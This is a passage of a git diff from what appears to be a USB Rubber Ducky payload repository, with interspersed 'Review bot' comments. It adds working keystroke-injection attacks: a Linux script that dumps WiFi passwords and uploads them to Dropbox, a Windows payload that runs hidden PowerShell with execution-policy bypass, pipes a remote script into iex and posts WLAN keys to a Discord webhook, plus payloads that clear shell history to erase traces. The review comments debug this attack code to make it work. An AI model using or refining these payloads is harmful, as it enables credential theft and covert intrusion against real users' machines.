SUBMIT_FOR_CHECK + But will obviously convolute combination checks. 
+ END_REM + + REM Combinations provided as defines for convenience (verbosely spaced - DEFINES aren't re-formatted by preprocessor) + DEFINE #ALL_LOCKS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ALL_LOCKS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + + DEFINE #ONLY_CAPS_ON ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ONLY_NUM_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + DEFINE #ONLY_SCROLL_ON ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + + DEFINE #ONLY_CAPS_OFF ( ( $_CAPSLOCK_ON == FALSE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + DEFINE #ONLY_NUM_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == FALSE ) && ( $_SCROLLLOCK_ON == TRUE ) ) + DEFINE #ONLY_SCROLL_OFF ( ( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE ) && ( $_SCROLLLOCK_ON == FALSE ) ) + + DEFINE #SUBMIT_FOR_CHECK WAIT_FOR_BUTTON_PRESS FUNCTION STORAGE_PASSWORD_CHECK() VAR $ACCEPED = FALSE LED_R - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM first combination ALL LOCKS OFF - IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ALL_LOCKS_OFF THEN STRING . - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM second combination ONLY CAPS ON - IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ONLY_CAPS_ON THEN STRING . - WAIT_FOR_BUTTON_PRESS + #SUBMIT_FOR_CHECK REM third combination ONLY NUM ON - IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN + IF #ONLY_NUM_ON THEN $ACCEPTED = TRUE END_IF END_IF diff --git a/payloads/extensions/translate.txt b/payloads/extensions/translate.txt index 811b9ea..6fc4d8f 100644 --- a/payloads/extensions/translate.txt +++ b/payloads/extensions/translate.txt 
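Review bot: `DEFINE #ALL_LOCKS_ON` ends with `( $_SCROLLLOCK_ON == FALSE )`, which makes it the same condition as `#ONLY_SCROLL_OFF` and never true with all three locks on; the last clause should be `( $_SCROLLLOCK_ON == TRUE )`. Separately, the function declares `VAR $ACCEPED = FALSE` but the innermost branch sets `$ACCEPTED = TRUE`, so whatever reads the flag after the checks is looking at a different variable; both lines are context here, and STORAGE_PASSWORD_CHECK continues past the end of the hunk. The new `REM_BLOCK` also lacks the `DOCUMENTATION` label the other extensions in this commit use, and the `CONFIGURATION:` text says combinations are "available as DEFINEs below" without saying that only three of the nine are actually referenced.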
@@ -1,41 +1,52 @@ EXTENSION TRANSLATE - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM This extension acts as a library or collection of helper functions - REM to work with converting variables in your payloads. - REM WHY: - REM Of the many ways to get information about the state of your payload - REM is by injecting static strings effectively as debugging prints - REM However, given the non-static nature of payloads using variables in - REM DuckyScript 3.0 - the ability to decode variables during payload - REM execution and print (inject) representations of their current state - REM can often be a critically helpful development and debugging tool. + REM_BLOCK DOCUMENTATION + This extension acts as a library or collection of helper functions + to work with converting variables in your payloads. + WHY: + Of the many ways to get information about the state of your payload + is by injecting static strings effectively as debugging prints + However, given the non-static nature of payloads using variables in + DuckyScript 3.0 - the ability to decode variables during payload + execution and print (inject) representations of their current state + can often be a critically helpful development and debugging tool. 
- REM Available Functions: - REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call - REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call - REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call - REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call + Available Functions: + DEFAULT: + TRANSLATE_INT() - var to decimal string - set $INPUT prior to call + EXTENDED: (enabled using the #INCLUDE defines below): + TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call + TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call + TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call - REM USAGE: - REM set $INPUT to desired var - REM call the correct translate_ function for the expected data type e.g. - REM VAR $myVar = 1234 - REM $INPUT = $myVar - REM TRANSLATE_INT() - REM REM the above code will inject 1234 + USAGE: + set $INPUT to desired var + call the correct translate_ function for the expected data type e.g. + VAR $myVar = 1234 + $INPUT = $myVar + TRANSLATE_INT() + REM the above code will inject 1234 + END_REM - REM begin extension variables - DEFINE PRINT_INT 0 - DEFINE PRINT_HEX 1 - VAR $DIGIT_PRINT_MODE = PRINT_INT + REM CONFIGURATION: + DEFINE #INCLUDE_TRANSLATE_HEX FALSE + DEFINE #INCLUDE_TRANSLATE_BOOL FALSE + DEFINE #INCLUDE_TRANSLATE_BINARY FALSE + DEFINE #INCLUDE_SWAP_ENDIAN FALSE + + REM Append ENTER after translation + VAR $AS_STRINGLN = TRUE + + DEFINE #PRINT_INT 0 + DEFINE #PRINT_HEX 1 + VAR $DIGIT_PRINT_MODE = #PRINT_INT VAR $D = 0 VAR $IN = 0 VAR $INPUT = 0 VAR $MOD = 0 VAR $P = FALSE - VAR $NL = TRUE - REM end extension variables REM REQUIRED for INT/HEX - convert int to char FUNCTION PRINTDIGIT() 
@@ -59,20 +70,22 @@ EXTENSION TRANSLATE STRING 8 ELSE IF ($D == 9) THEN STRING 9 - ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN - IF ($D == 10) THEN - STRING A - ELSE IF ($D == 11) THEN - STRING B - ELSE IF ($D == 12) THEN - STRING C - ELSE IF ($D == 13) THEN - STRING D - ELSE IF ($D == 14) THEN - STRING E - ELSE IF ($D == 15) THEN - STRING F - END_IF + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX + ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN + IF ($D == 10) THEN + STRING A + ELSE IF ($D == 11) THEN + STRING B + ELSE IF ($D == 12) THEN + STRING C + ELSE IF ($D == 13) THEN + STRING D + ELSE IF ($D == 14) THEN + STRING E + ELSE IF ($D == 15) THEN + STRING F + END_IF + END_IF_DEFINED ELSE STRING ? END_IF @@ -91,15 +104,18 @@ EXTENSION TRANSLATE END_IF END_FUNCTION - REM ENDIAN SWAPPER helper, (useful for working with VID/PID) - FUNCTION SWAP_ENDIAN() - $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) - END_FUNCTION + IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN + REM ENDIAN SWAPPER helper, (useful for working with VID/PID) + FUNCTION SWAP_ENDIAN() + $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00)) + END_FUNCTION + END_IF_DEFINED + REM Translates a variable of presumed integer type and attempts to convert REM and inject a DECIMAL string representation FUNCTION TRANSLATE_INT() - $DIGIT_PRINT_MODE = PRINT_INT + $DIGIT_PRINT_MODE = #PRINT_INT $P = FALSE IF ( $INPUT >= 10000) THEN $MOD = 10000 
@@ -119,99 +135,108 @@ EXTENSION TRANSLATE END_IF() $D = $INPUT PRINTDIGIT() - IF $NL THEN + IF $AS_STRINGLN THEN ENTER END_IF END_FUNCTION REM Translates a variable of presumed boolean type and attempts to convert REM and inject a BOOLEAN string representation - FUNCTION TRANSLATE_BOOL() - IF $INPUT THEN - STRING TRUE - ELSE - STRING FALSE - END_IF - IF $NL THEN - ENTER - END_IF - END_FUNCTION + REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL + FUNCTION TRANSLATE_BOOL() + IF $INPUT THEN + STRING TRUE + ELSE + STRING FALSE + END_IF + IF $AS_STRINGLN THEN + ENTER + END_IF + END_FUNCTION + END_IF_DEFINED REM Translates a variable of presumed integer type and attempts to convert REM and inject a HEX string representation - FUNCTION TRANSLATE_HEX() - $DIGIT_PRINT_MODE = PRINT_HEX - VAR $chars = 0 - VAR $d1 = 0 - VAR $d2 = 0 - VAR $d3 = 0 - VAR $d4 = 0 - WHILE ($INPUT > 0) + REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX + FUNCTION TRANSLATE_HEX() + $DIGIT_PRINT_MODE = #PRINT_HEX + VAR $chars = 0 + VAR $d1 = 0 + VAR $d2 = 0 + VAR $d3 = 0 + VAR $d4 = 0 + WHILE ($INPUT > 0) + IF ($chars == 0) THEN + $d1 = ($INPUT % 16) + ELSE IF ($chars == 1) THEN + $d2 = ($INPUT % 16) + ELSE IF ($chars == 2) THEN + $d3 = ($INPUT % 16) + ELSE IF ($chars == 3) THEN + $d4 = ($INPUT % 16) + END_IF + $chars = ($chars + 1) + $INPUT = ($INPUT / 16) + END_WHILE + VAR $i = 0 + STRING 0x IF ($chars == 0) THEN - $d1 = ($INPUT % 16) + STRING 0x0000 ELSE IF ($chars == 1) THEN - $d2 = ($INPUT % 16) + STRING 000 + $D = $d1 + PRINTDIGIT() ELSE IF ($chars == 2) THEN - $d3 = ($INPUT % 16) + STRING 00 + $D = $d2 + PRINTDIGIT() + $D = $d1 + PRINTDIGIT() ELSE IF ($chars == 3) THEN - $d4 = ($INPUT % 16) + STRING 0 + $D = $d3 + PRINTDIGIT() + $D = $d2 + PRINTDIGIT() + $D = $d1 + PRINTDIGIT() + ELSE IF ($chars == 4) THEN + STRING 0 + $D = $d4 + PRINTDIGIT() + $D = $d3 + PRINTDIGIT() + $D = $d2 
+ PRINTDIGIT() + $D = $d1 + PRINTDIGIT() END_IF - $chars = ($chars + 1) - $INPUT = ($INPUT / 16) - END_WHILE - VAR $i = 0 - STRING 0x - IF ($chars == 0) THEN - STRING 0x0000 - ELSE IF ($chars == 1) THEN - STRING 000 - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 2) THEN - STRING 00 - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 3) THEN - STRING 0 - $D = $d3 - PRINTDIGIT() - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - ELSE IF ($chars == 4) THEN - STRING 0 - $D = $d4 - PRINTDIGIT() - $D = $d3 - PRINTDIGIT() - $D = $d2 - PRINTDIGIT() - $D = $d1 - PRINTDIGIT() - END_IF - IF $NL THEN - ENTER - END_IF - END_FUNCTION + IF $AS_STRINGLN THEN + ENTER + END_IF + END_FUNCTION + END_IF_DEFINED REM Translates a variable of presumed integer type and attempts to convert REM and inject a BINARY string representation - FUNCTION TRANSLATE_BINARY() - VAR $I = 16 - WHILE ( $I > 0 ) - $I = ($I - 1) - IF (($INPUT & 0x8000) == 0 ) THEN - STRING 0 - ELSE - STRING 1 + REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling + IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY + FUNCTION TRANSLATE_BINARY() + VAR $I = 16 + WHILE ( $I > 0 ) + $I = ($I - 1) + IF (($INPUT & 0x8000) == 0 ) THEN + STRING 0 + ELSE + STRING 1 + END_IF + $INPUT = ($INPUT << 1) + END_WHILE + IF $AS_STRINGLN THEN + ENTER END_IF - $INPUT = ($INPUT << 1) - END_WHILE - IF $NL THEN - ENTER - END_IF - END_FUNCTION + END_FUNCTION + END_IF_DEFINED END_EXTENSION diff --git a/payloads/extensions/windows_hid_exfil.txt b/payloads/extensions/windows_hid_exfil.txt index d382380..c9ae11c 100644 --- a/payloads/extensions/windows_hid_exfil.txt +++ b/payloads/extensions/windows_hid_exfil.txt 
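Review bot: In the re-indented TRANSLATE_HEX body, `STRING 0x` is emitted unconditionally and the `$chars == 0` branch then emits `STRING 0x0000`, so a zero input types `0x0x0000`; that branch should be `STRING 0000`. The `$chars == 4` branch likewise emits `STRING 0` before its four digits, giving five hex digits for any input of 0x1000 or more, and `VAR $i = 0` is never read. The enabling comments `REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling` (and the HEX and BINARY variants) name the defines without the `#` they are declared with. These lines all predate the commit, but it rewrites every one of them, so it is the natural place to fix them.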
@@ -1,51 +1,91 @@ EXTENSION WINDOWS_HID_EXFIL - REM VERSION 1.0 + REM VERSION 1.1 + REM AUTHOR: Korben - REM Helpers for Keystroke Reflection data exfiltration - REM This payload is a proof of concept for USB HID only Data Exfiltration + REM_BLOCK DOCUMENTATION + Helpers for Keystroke Reflection data exfiltration + This payload is a proof of concept for USB HID only Data Exfiltration - REM TARGET: - REM Windows Hostthat supports powershell and SendKeys + TARGET: + Windows Host that supports powershell and SendKeys - REM USAGE: - REM Uncomment the function call below to run this extension inline - REM or call RUN_EXFIL() anywhere in your payload after the extension + USAGE: + Prepare data to exfil (in filename defined by TARGET_FILE below) + with a powershell window already open - call RUN_WINDOWS_EXFIL() - REM DEPLOYMENT: - REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. + DEPLOYMENT: + Plug Ducky into host, wait for the LED to turn (and stay) solid green. + END_REM REM CONFIGURATION: - REM File on host machine to exfil using Keystroke Reflection attack - DEFINE TARGET_FILE filename.txt + REM File on host machine to exfil + DEFINE #TARGET_FILE filename.txt + + DEFINE #SAVE_AND_RESTORE_LOCKS TRUE + DEFINE #ENABLE_EXFIL_LEDS TRUE + DEFINE #CLOSE_AFTER_EXFIL TRUE + + DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE + FUNCTION RUN_WINDOWS_EXFIL() - REM Boot - LED_OFF - DELAY 500 - REM Launch Windows RUN dialog - GUI r - DELAY 50 - REM Launch powershell - STRING powershell - ENTER - DELAY 250 - REM Save HOSTs current lock state - SAVE_HOST_KEYBOARD_LOCK_STATE - REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + SAVE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_OFF + $_EXFIL_LEDS_ENABLED = TRUE + END_IF_DEFINED + $_EXFIL_MODE_ENABLED = TRUE - $_EXFIL_LEDS_ENABLED = TRUE - REM Convert and reflect target file - STRING foreach($b in $(Get-Content 
"TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit; + STRING_POWERSHELL + foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){ + foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){ + If($b -band $a){ + $o+="%{NUMLOCK}" + }Else{ + $o+="%{CAPSLOCK}" + } + } + }; + $o+="%{SCROLLLOCK}"; + Add-Type -Assembly System.Windows.Forms; + [System.Windows.Forms.SendKeys]::SendWait("$o"); + exit; + END_STRING + IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL + STRING exit; + END_IF_DEFINED + ENTER + REM Listen for EOF WAIT_FOR_SCROLL_CHANGE - REM Indicate SUCCESS on Device LED, Disable EXFIL mode - LED_G $_EXFIL_MODE_ENABLED = FALSE - REM Restore HOSTs lock state to original - RESTORE_HOST_KEYBOARD_LOCK_STATE + + IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS + LED_G + END_IF_DEFINED + + IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS + RESTORE_HOST_KEYBOARD_LOCK_STATE + END_IF_DEFINED END_FUNCTION - REM Uncomment the function call below to run this extension inline (here) - REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension - REM RUN_WINDOWS_EXFIL() + IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO + REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template. + REM DEMO Boot Delay + DELAY 3000 + REM Open run dialog + GUI r + DELAY 500 + REM Open Powershell + STRINGLN powershell + DELAY 500 + REM Prepare some data in TARGET_FILE + STRINGLN echo test123 > #TARGET_FILE + DELAY 500 + REM Exfil data to USB Rubber Ducky using Keystroke Reflection + RUN_WINDOWS_EXFIL() + END_IF_DEFINED END_EXTENSION diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md new file mode 100644 index 0000000..18db31d --- /dev/null 
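Review bot: The new `#CLOSE_AFTER_EXFIL` define in RUN_WINDOWS_EXFIL has no effect, because the STRING_POWERSHELL block already ends with an unconditional `exit;`; the `STRING exit;` under `IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL` only appends a second `exit;` that is never reached. Either remove the `exit;` line from the STRING_POWERSHELL block so the toggle actually decides, or drop the toggle and its DEFINE from the configuration section. Separately, `$_EXFIL_LEDS_ENABLED = TRUE` is set when `#ENABLE_EXFIL_LEDS` is on but never cleared after WAIT_FOR_SCROLL_CHANGE, unlike `$_EXFIL_MODE_ENABLED`; if the intent is to mirror that variable, `$_EXFIL_LEDS_ENABLED = FALSE` next to the `LED_G` would be consistent.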
+++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md @@ -0,0 +1,29 @@ + +# Exfiltrate WiFi Passwords - Linux ✅ + +A script used to exfiltrate the wifi passwords on a Linux machine. + +**Category**: Exfiltrate, Credentials, Execution + +## Description + +A script used to exfiltrate the wifi passwords on a Linux machine. + +Opens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Dropbox Token +* Permissions + +### Executing program + +* Plug in your device + +### Settings + +* Set the Dropbox token +* Set the sudo password \ No newline at end of file diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt new file mode 100644 index 0000000..bb5b1b6 --- /dev/null +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt 
@@ -0,0 +1,128 @@ + +REM ####################################################### +REM # | +REM # Title : Exfiltrate Wifi Passwords - Linux | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Credentials, Execution | +REM # Target : Linux | +REM # | +REM ####################################################### + +REM Requirements: +REM - Permissions +REM - Internet connection +REM - Dropbox Token + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PREREQUISITES SECTION #### + + +REM Required: You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example +STRING sudo su +ENTER + +DELAY 1000 +STRING SUDO_PASS +ENTER + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + + +REM #### ZIP SECTION #### + + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER + +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX) +ENTER + +DELAY 500 +STRING ZIP_PATH="/home/$ZIP_NAME" +ENTER + + +REM #### WiFi && ZIP SECTION #### + + +REM Get all WiFi data +STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do +ENTER +DELAY 500 +STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" - +ENTER +DELAY 500 +STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" - +ENTER +DELAY 500 +STRING done +ENTER +DELAY 500 +REM Wifi exfiltration command time - It depends +DELAY 1000 + +STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +REM Zip operation time - It depends +DELAY 3000 + + +REM #### EXFILTRATE SECTION #### + + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +ENTER +STRING DROPBOX_FOLDER_NAME +ENTER +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING 
--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + + +REM #### REMOVE TRACES #### + + +DELAY 2000 +STRING history -c +ENTER + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER + +DELAY 500 +STRING rm -rf "$ZIP_PATH" +ENTER + +DELAY 500 +STRING exit +ENTER + +DELAY 500 +STRING exit +ENTER diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh new file mode 100755 index 0000000..3a733f3 --- /dev/null +++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do + nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" - + nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" - +done diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/README.md b/payloads/library/credentials/WLAN-Windows-Passwords/README.md new file mode 100644 index 0000000..095a5a2 --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md @@ -0,0 +1,26 @@ +# WLAN Windows Password - BADUSB ✅ + +A script used to stole target WLAN Passwords. + +**Category**: WLAN, Credentials + +## Description + +A script used to stole target WLAN Passwords. + +Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke 2 netsh commands +* Invoke-WebRequest will be entered in the Run Box to send the content 
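Review bot: `STRING RANDOM=$(shuf -i 1-999999999999 -n 1)` assigns to bash's special `RANDOM` variable, which reseeds the shell's generator instead of storing the value, so the later `STRING ZIP_NAME="$RANDOM.zip"` expands to a fresh 0–32767 number and the 12-digit `shuf` result is discarded. A non-special name keeps the intent readable, e.g. `STRING RAND_ID=$(shuf -i 1-999999999999 -n 1)` and `STRING ZIP_NAME="$RAND_ID.zip"`. The same pattern appears in the new ExfiltrateLinuxContentWithDropbox, ExfiltrateLinuxLogFiles and ExfiltrateNetworkConfiguration_Linux payload.txt files.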
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 new file mode 100644 index 0000000..d2edacf --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1 @@ -0,0 +1,16 @@ + +# ENG +netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object { + $wlan = $_.Matches.Value + $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+' + + $Body = @{ + 'username' = $env:username + " | " + [string]$wlan + 'content' = [string]$passw + } + + Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json) +} + +# Clear the PowerShell command history +Clear-History diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt new file mode 100644 index 0000000..379fe45 --- /dev/null +++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt @@ -0,0 +1,25 @@ +REM ################################################################### +REM # | +REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration | +REM # Author : Aleff | +REM # Description: A script used to stole target WLAN Passwords. | +REM # Category : Credentials | +REM # Target : Windows 10-11 | +REM # Version : 1.0 | +REM # | +REM ################################################################### + + + +DELAY 2000 +GUI r +DELAY 250 +STRING powershell -w h -ep bypass $discord=' + +REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// +DEFINE DISCORD example.com +STRING DISCORD + +REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1 +DEFINE PAYLOAD example.com +STRINGLN ';irm PAYLOAD | iex 
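Review bot: `$discord` on the `Invoke-RestMethod` line is never defined in Windows-Passwords.ps1; it is only set by the `$discord='…'` that payload.txt types before `irm PAYLOAD | iex`, so run on its own the script would fail at parameter binding with no `-Uri`, and nothing in the file says so. A header comment stating the contract, e.g. `# Requires $discord (webhook URL) to be set by the invoking payload before this script runs`, would document the coupling; the bare `# ENG` comment does not. The new ProtonVPN-config.ps1 has the same implicit dependency in `$hookurl = "$discord"`.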
diff --git a/payloads/library/execution/ChangeMacAddress_Linux/README.md b/payloads/library/execution/ChangeMacAddress_Linux/README.md new file mode 100644 index 0000000..8567288 --- /dev/null +++ b/payloads/library/execution/ChangeMacAddress_Linux/README.md @@ -0,0 +1,28 @@ + +# Change MAC Address + +A script used to change the MAC address on a Linux machine. + +**Category**: Execution + +## Description + +A script used to change the MAC address on a Linux machine. + +Opens a shell, get the network card name, set the new MAC address, erase traces. + +## Getting Started + +### Dependencies + +* Linux Permissions +* Internet Connection + +### Executing program + +* Plug in your device + +### Settings + +* Set the sudo password +* Change as you want the new MAC address \ No newline at end of file diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt new file mode 100644 index 0000000..e0c538f --- /dev/null +++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt 
@@ -0,0 +1,73 @@ + +REM ########################################### +REM # | +REM # Title : Change Linux MAC Address | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Linux | +REM # | +REM ########################################### + +REM Requirements: +REM - Permissions + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PERMISSIONS SECTION #### + + +REM You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example + +STRING sudo su +ENTER +DELAY 1000 +STRING SUDO_PASS +ENTER +DELAY 1000 + + +REM #### MAC SECTION #### + + +REM net-tools command +STRING apt install net-tools +ENTER +DELAY 2000 + +REM Set here your preferred MAC, you can don't change it remaining with the default value +DEFINE NEW_MAC FF:FF:FF:FF:FF:FF + +REM Get the net interface name +STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}') +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE down +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE hw ether +STRING NEW_MAC +ENTER +DELAY 500 + +STRING ifconfig $INTERFACE up +ENTER +DELAY 500 + + +REM #### REMOVE TRACES #### + + +DELAY 2000 +STRING history -c +ENTER + +REM Close shell +STRING exit +ENTER diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md new file mode 100644 index 0000000..9fb6564 --- /dev/null +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md 
@@ -0,0 +1,27 @@ + +# Change Network Configuration + +A script used to change the network configuration on a Linux machine. + +**Category**: Execution + +## Description + +A script used to change the network configuration on a Linux machine. + +Opens a shel, get the network card name, set the network configuration, erase traces. + +## Getting Started + +### Dependencies + +* Linux Permissions + +### Executing program + +* Plug in your device + +### Settings + +* Set the sudo password +* Change as you want the network configuration \ No newline at end of file diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt new file mode 100644 index 0000000..af732aa --- /dev/null +++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt 
@@ -0,0 +1,81 @@ + +REM ############################################### +REM # | +REM # Title : Change Network Configuration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Linux | +REM # | +REM ############################################### + +REM Requirements: +REM - Permissions + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### PERMISSIONS SECTION #### + + +REM Required: You need to know the sudo password and replace 'example' with this +DEFINE SUDO_PASS example +STRING sudo su +ENTER + +DELAY 1000 +STRING SUDO_PASS +ENTER +DELAY 1000 + + +REM #### IP SECTION #### + + +REM net-tools command +STRING apt install net-tools +ENTER +DELAY 2000 + +REM Set network interface +DEFINE IP 192.168.1.100 +DEFINE MASK 255.255.255.0 +DEFINE GATEWAY 192.168.1.1 + +STRING IP=" +STRING IP +STRING " +ENTER +DELAY 500 +STRING MASK=" +STRING MASK +STRING " +ENTER +DELAY 500 +STRING GATEWAY=" +STRING GATEWAY +STRING " +ENTER +DELAY 500 + +REM Get the net interface name +STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}') +ENTER +DELAY 500 +STRING ifconfig $INTERFACE $IP netmask $MASK up +ENTER +DELAY 500 + + +REM #### REMOVE TRACES #### + + +STRING history -c 